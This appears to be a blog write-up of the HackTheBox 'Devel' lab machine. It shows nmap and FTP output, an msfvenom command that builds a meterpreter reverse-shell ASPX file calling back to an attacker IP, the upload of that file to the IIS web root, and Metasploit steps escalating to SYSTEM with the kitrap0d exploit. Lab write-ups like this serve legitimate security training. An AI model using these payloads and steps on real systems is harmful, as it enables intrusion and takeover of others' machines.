Home Devel writeup
Post
Cancel
Preview Image

Devel writeup

Posted 2022-06-21 5 min read

Summary

This box focuses on exploiting a Windows machine hosting an IIS service as well as an ftp service which gives write access to the IIS directory. Metasploit can then be used to gain a foothold and also root the box.

Foothold & privilege escalation

Let’s start out by doing a port scan with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-12 11:52 EDT
Nmap scan report for 10.129.237.156
Host is up (0.027s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Anonymous ftp login is allowed. Lets try that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

┌──(bitis㉿workstation)-[~/htb/Machines/Devel]
└─$ ftp 10.129.133.162
Connected to 10.129.133.162.
220 Microsoft FTP Service
Name (10.129.133.162:bitis): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp>

Based on the contents of the directory, we have access to the IIS7 directory. This means that if we put a .aspx{: .filepath} file in the directory we would be able to access it via our browser. In that case let’s create a reverse shell via msfvenom:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

┌──(bitis㉿workstation)-[~/htb/Machines/Devel]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.182 LPORT=1337 -f aspx > shell.aspx  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2856 bytes
                                                                                                                                                                                                                                            
┌──(bitis㉿workstation)-[~/htb/Machines/Devel]
└─$ ftp 10.129.133.162                                                                            
Connected to 10.129.133.162.
220 Microsoft FTP Service
Name (10.129.133.162:bitis): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put ./shell.aspx
local: ./shell.aspx remote: ./shell.aspx
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************|  2893       13.32 MiB/s    --:-- ETA
226 Transfer complete.
2893 bytes sent in 00:00 (26.60 KiB/s)
ftp> exit
221 Goodbye.

Notice that we uploaded the file via the PUT command.

We can then use the handler provided by metasploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.17.182
LHOST => 10.10.17.182
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.182:1337 
[*] Sending stage (175686 bytes) to 10.129.133.162
[*] Meterpreter session 1 opened (10.10.17.182:1337 -> 10.129.133.162:49170) at 2022-06-21 18:52:28 +0200

meterpreter > cd /windows/TEMP
meterpreter > background
[*] Backgrounding session 3...

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 3
SESSION => 3
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.133.162 - Collecting local exploits for x86/windows...
[*] 10.129.133.162 - 167 exploit checks are being tried...
[+] 10.129.133.162 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.133.162 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.129.133.162 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.133.162 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.133.162 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.129.133.162 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

Running down this list of exlpoits we find a working exploit with the name ms10_015_kitrap0d

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

msf6 exploit(windows/local/ms10_092_schelevator) > use windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.17.182     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.17.182
LHOST => 10.10.17.182
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.17.182:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3880 launched.
[*] Reflectively injecting the DLL into 3880...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.133.162
[*] Meterpreter session 4 opened (10.10.17.182:4444 -> 10.129.133.162:49177) at 2022-06-21 20:27:10

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Rooted!

Writeup, HackTheBox
Easy-box windows metasploit
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents